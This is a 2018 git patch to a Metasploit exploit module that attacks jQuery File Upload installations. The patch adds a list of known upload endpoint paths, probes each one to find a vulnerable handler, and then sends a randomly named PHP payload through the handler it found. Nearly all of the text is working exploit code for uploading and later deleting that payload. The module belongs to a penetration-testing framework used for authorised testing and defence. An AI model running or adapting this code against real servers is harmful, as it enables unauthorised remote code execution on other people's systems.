From dbc0c802d593930bb2cf809c4e9240fecbcbf800 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Mon, 22 Oct 2018 22:19:10 -0500
Subject: [PATCH] Add detection of additional paths

---
 .../unix/webapp/jquery_file_upload.rb         | 43 ++++++++++++++-----
 1 file changed, 32 insertions(+), 11 deletions(-)

diff --git a/modules/exploits/unix/webapp/jquery_file_upload.rb b/modules/exploits/unix/webapp/jquery_file_upload.rb
index 18a7033599..b660498f8f 100644
--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -43,26 +43,47 @@ class MetasploitModule < Msf::Exploit::Remote
     ))
 
     register_options([
-      OptString.new('TARGETURI', [true, 'jQuery File Upload base path', '/'])
+      OptString.new('TARGETURI', [true, 'Base path', '/jQuery-File-Upload'])
     ])
   end
 
-  def check
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri'    => normalize_uri(target_uri.path, 'server/php/index.php')
-    )
+  # List from PoC
+  def upload_paths
+    %w[
+      /server/php/index.php
+      /server/php/upload.class.php
+      /example/upload.php
+      /server/php/UploadHandler.php
+      /php/index.php
+    ].map { |u| normalize_uri(target_uri.path, u) }
+  end
 
-    if res && res.code == 200
-      return CheckCode::Detected
+  def check
+    upload_paths.each do |u|
+      vprint_status("Checking #{u}")
+
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => u
+      )
+
+      if res && res.code == 200
+        vprint_good("Found #{u}")
+        @u = u
+        return CheckCode::Detected
+      end
     end
 
     CheckCode::Safe
   end
 
   def exploit
+    unless check == CheckCode::Detected
+      fail_with(Failure::NotFound, 'Could not find target')
+    end
+
     f = "#{rand_text_alphanumeric(8..42)}.php"
-    u = normalize_uri(target_uri.path, "server/php/files/#{f}")
+    u = normalize_uri(File.dirname(@u), 'files', f)
 
     print_status('Uploading payload')
     res = upload_payload(f)
@@ -88,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'POST',
-      'uri'    => normalize_uri(target_uri.path, 'server/php/index.php'),
+      'uri'    => @u,
       'ctype'  => "multipart/form-data; boundary=#{m.bound}",
       'data'   => m.to_s
     )
@@ -104,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def delete_payload(f)
     send_request_cgi(
       'method'   => 'DELETE',
-      'uri'      => normalize_uri(target_uri.path, 'server/php/index.php'),
+      'uri'      => @u,
       'vars_get' => {'file' => f}
     )
   end